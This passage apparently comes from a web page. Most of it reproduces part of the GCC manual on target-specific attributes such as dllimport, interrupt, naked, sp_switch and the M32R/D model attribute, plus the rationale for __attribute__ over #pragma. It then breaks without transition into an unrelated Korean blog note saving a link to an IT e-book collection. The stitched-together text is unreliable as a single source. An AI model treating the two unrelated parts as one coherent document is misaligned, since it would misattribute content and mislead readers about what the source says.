On the PowerPC running Windows NT, the dllimport attribute causes the compiler to call the function via a global pointer to the function pointer that is set up by the Windows NT dll library. The pointer name is formed by combining __imp_ and the function name. 

dllexport

On the PowerPC running Windows NT, the dllexport attribute causes the compiler to provide a global pointer to the function pointer, so that it can be called with the dllimport attribute. The pointer name is formed by combining __imp_ and the function name. 

exception (except-func [, except-arg])

On the PowerPC running Windows NT, the exception attribute causes the compiler to modify the structured exception table entry it emits for the declared function. The string or identifier except-func is placed in the third entry of the structured exception table. It represents a function, which is called by the exception handling mechanism if an exception occurs. If it was specified, the string or identifier except-arg is placed in the fourth entry of the structured exception table. 

function_vector

Use this attribute on the H8/300 and H8/300H to indicate that the specified function should be called through the function vector. Calling a function through the function vector will reduce code size, however; the function vector has a limited size (maximum 128 entries on the H8/300 and 64 entries on the H8/300H) and shares space with the interrupt vector.

You must use GAS and GLD from GNU binutils version 2.7 or later for this attribute to work correctly. 

interrupt

Use this attribute on the ARM, AVR, M32R/D and Xstormy16 ports to indicate that the specified function is an interrupt handler. The compiler will generate function entry and exit sequences suitable for use in an interrupt handler when this attribute is present.

Note, interrupt handlers for the H8/300, H8/300H and SH processors can be specified via the interrupt_handler attribute.

Note, on the AVR interrupts will be enabled inside the function.

Note, for the ARM you can specify the kind of interrupt to be handled by adding an optional parameter to the interrupt attribute like this:

          void f () __attribute__ ((interrupt ("IRQ")));
          

Permissible values for this parameter are: IRQ, FIQ, SWI, ABORT and UNDEF. 

interrupt_handler

Use this attribute on the H8/300, H8/300H and SH to indicate that the specified function is an interrupt handler. The compiler will generate function entry and exit sequences suitable for use in an interrupt handler when this attribute is present. 

sp_switch

Use this attribute on the SH to indicate an interrupt_handler function should switch to an alternate stack. It expects a string argument that names a global variable holding the address of the alternate stack.

          void *alt_stack;
          void f () __attribute__ ((interrupt_handler,
                                    sp_switch ("alt_stack")));
          

trap_exit

Use this attribute on the SH for an interrupt_handle to return using trapa instead of rte. This attribute expects an integer argument specifying the trap number to be used. 

eightbit_data

Use this attribute on the H8/300 and H8/300H to indicate that the specified variable should be placed into the eight bit data section. The compiler will generate more efficient code for certain operations on data in the eight bit data area. Note the eight bit data area is limited to 256 bytes of data.

You must use GAS and GLD from GNU binutils version 2.7 or later for this attribute to work correctly. 

tiny_data

Use this attribute on the H8/300H to indicate that the specified variable should be placed into the tiny data section. The compiler will generate more efficient code for loads and stores on data in the tiny data section. Note the tiny data area is limited to slightly under 32kbytes of data. 

signal

Use this attribute on the AVR to indicate that the specified function is an signal handler. The compiler will generate function entry and exit sequences suitable for use in an signal handler when this attribute is present. Interrupts will be disabled inside function. 

naked

Use this attribute on the ARM or AVR ports to indicate that the specified function do not need prologue/epilogue sequences generated by the compiler. It is up to the programmer to provide these sequences. 

model (model-name)

Use this attribute on the M32R/D to set the addressability of an object, and the code generated for a function. The identifier model-name is one of small, medium, or large, representing each of the code models.

Small model objects live in the lower 16MB of memory (so that their addresses can be loaded with the ld24 instruction), and are callable with the bl instruction.

Medium model objects may live anywhere in the 32-bit address space (the compiler will generate seth/add3 instructions to load their addresses), and are callable with the bl instruction.

Large model objects may live anywhere in the 32-bit address space (the compiler will generate seth/add3 instructions to load their addresses), and may not be reachable with the bl instruction (the compiler will generate the much slower seth/add3/jlinstruction sequence).

You can specify multiple attributes in a declaration by separating them by commas within the double parentheses or by immediately following an attribute declaration with another attribute declaration.

Some people object to the __attribute__ feature, suggesting that ISO C's #pragma should be used instead. At the time __attribute__ was designed, there were two reasons for not doing this.

1. It is impossible to generate #pragma commands from a macro.
2. There is no telling what the same #pragma might mean in another compiler.

These two reasons applied to almost any application that might have been proposed for #pragma. It was basically a mistake to use #pragma for anything.

The ISO C99 standard includes _Pragma, which now allows pragmas to be generated from macros. In addition, a #pragma GCC namespace is now in use for GCC-specific pragmas. However, it has been found convenient to use __attribute__ to achieve a natural attachment of attributes to their corresponding declarations, whereas #pragma GCC is of use for constructs that do not naturally form part of the grammar. See Miscellaneous Preprocessing Directives.

요즘 하고픈게 너무 많아 책읽은 시간이 부족하지만..

저장용 및 공유용 

키워드 : e book 이북. 인터넷 서적. 

IT 관련 E-book 모아 놓은 사이트 저장~

huge collection ebook:
+ Android
+ CSS
+ Hack
+ Python
and more.....

링크 : http://blog.acronym.co.kr/329?fb_action_ids=291874987652641&fb_action_types=og.comments